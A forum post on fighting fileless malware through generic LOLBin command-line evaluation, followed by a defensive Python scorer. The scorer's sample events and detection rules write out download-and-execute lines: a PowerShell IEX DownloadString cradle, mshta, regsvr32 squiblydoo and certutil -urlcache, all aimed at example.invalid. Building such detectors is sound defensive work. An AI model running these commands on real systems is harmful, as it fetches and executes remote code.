Of LoLBins, 0 Days, and ESET (Part 2)
<blockquote data-quote="Trident" data-source="post: 1084096" data-attributes="member: 99014"><p>Once again, we are reaching the point where it should be mentioned that a complete copy-and-paste of methods from vendor to vendor is not necessary.</p><p></p><p>For the highest efficiency against fileless malware, it is of <strong>extreme</strong> importance that generic methods are developed, e.g. <strong>evaluating LOLBin command lines</strong> and terminating execution there and then, as well as working closely with AMSI and proprietary hooking.</p><p>Just relying on web blocking and definitions is not enough, as the website/domain name may be new (or generated on the spot for the attack), and definitions have zero effectiveness on obfuscated code.</p><p></p><p>Having cloud emulation (a sandbox) is another great approach.</p><p></p><p>Then the question arises of how important blocking fileless attacks on home users' machines is.</p><p>We do not have enough information to conclude how prevalent these are.</p></blockquote>
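The kind of generic LOLBin command-line evaluation the post argues for, as an added example that is not part of the original post and is not ESET's or any other vendor's code: a Python scorer run over constructed process-creation events. The rule names, weights, thresholds, the `example.invalid` URLs and the sample events are all hypothetical. It strips cmd.exe caret and quote obfuscation, decodes a PowerShell `-EncodedCommand` payload before matching so the same rules see through the base64 wrapper, and raises the score when the parent is an Office application.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Hypothetical thresholds, rules and sample events: constructed for this
# example, not taken from the post or from any vendor product.
TERMINATE_AT = 70
ALERT_AT = 30


@dataclass(frozen=True)
class Rule:
    name: str
    image: str    # regex matched against the process image name
    pattern: str  # regex matched against normalised command line + decoded payload
    weight: int


RULES = [
    Rule("ps_hidden_noprofile", r"powershell|pwsh", r"-w(indowstyle)? hidden|-nop(rofile)?", 15),
    Rule("ps_iex", r"powershell|pwsh", r"\biex\b|invoke-expression", 30),
    Rule("ps_download_cradle", r"powershell|pwsh",
         r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|bitstransfer", 40),
    Rule("mshta_remote_or_script", r"mshta", r"https?://|javascript:|vbscript:", 70),
    Rule("regsvr32_squiblydoo", r"regsvr32", r"/i:https?://|scrobj\.dll", 70),
    Rule("rundll32_script", r"rundll32", r"javascript:|vbscript:|url\.dll, ?fileprotocolhandler", 70),
    Rule("certutil_download", r"certutil", r"-urlcache|-decode", 50),
    Rule("wmic_create_or_xsl", r"wmic", r"process call create|/format:", 50),
    Rule("bitsadmin_transfer", r"bitsadmin", r"/transfer|/addfile", 50),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def strip_obfuscation(cmdline: str) -> str:
    """Undo cmd.exe-level tricks that do not change what actually runs:
    caret escapes (p^o^w^ershell) and inserted quotes (pow"er"shell)."""
    s = cmdline.replace("^", "").replace('"', "")
    return re.sub(r"\s+", " ", s).strip()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    except ValueError:
        return None
    return raw.decode("utf-16-le", errors="ignore")


@dataclass
class Verdict:
    image: str
    score: int
    hits: list = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def action(self) -> str:
        if self.score >= TERMINATE_AT:
            return "terminate"
        return "alert" if self.score >= ALERT_AT else "allow"


def evaluate(parent: str, image: str, cmdline: str) -> Verdict:
    """Score one process-creation event; a real product would block at 'terminate'."""
    norm = strip_obfuscation(cmdline)
    img = image.lower()
    decoded = decode_encoded_command(norm) if re.search(r"powershell|pwsh", img) else None
    # Match rules against the visible command line AND the decoded payload, so a
    # base64 wrapper does not hide a download cradle from the same generic rules.
    haystack = norm.lower() + ("\n" + decoded.lower() if decoded else "")
    v = Verdict(image=img, score=0, decoded=decoded)
    if decoded is not None:
        v.score += 60
        v.hits.append("ps_encoded_command")
    for r in RULES:
        if re.search(r.image, img) and re.search(r.pattern, haystack):
            v.score += r.weight
            v.hits.append(r.name)
    # Context matters: a LOLBin spawned by an Office application is far more suspicious.
    if v.hits and parent.lower() in OFFICE_PARENTS:
        v.score += 30
        v.hits.append("office_parent")
    return v


# Constructed sample process-creation events: (parent image, image, command line).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ("winword.exe", "powershell.exe", f"powershell.exe -NoP -W Hidden -enc {_ENC}"),
    ("cmd.exe", "mshta.exe", 'msh^ta.exe "ht"tp://example.invalid/p.hta'),
    ("cmd.exe", "regsvr32.exe", "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
    ("cmd.exe", "certutil.exe", "certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe"),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
]


def triage(events=SAMPLE_EVENTS):
    """Evaluate every event; returns (image, action, rule hits) per event."""
    out = []
    for parent, image, cmd in events:
        v = evaluate(parent, image, cmd)
        out.append((image, v.action, v.hits))
    return out


if __name__ == "__main__":
    for image, action, hits in triage():
        print(f"{action:9s} {image:16s} {', '.join(hits) or '-'}")
```

In a product this logic would sit on the process-creation path (the "terminating execution there and then" the post describes) and feed the decoded script text to AMSI as well; the decode step is what makes the difference against the obfuscated payloads the post says definitions cannot see.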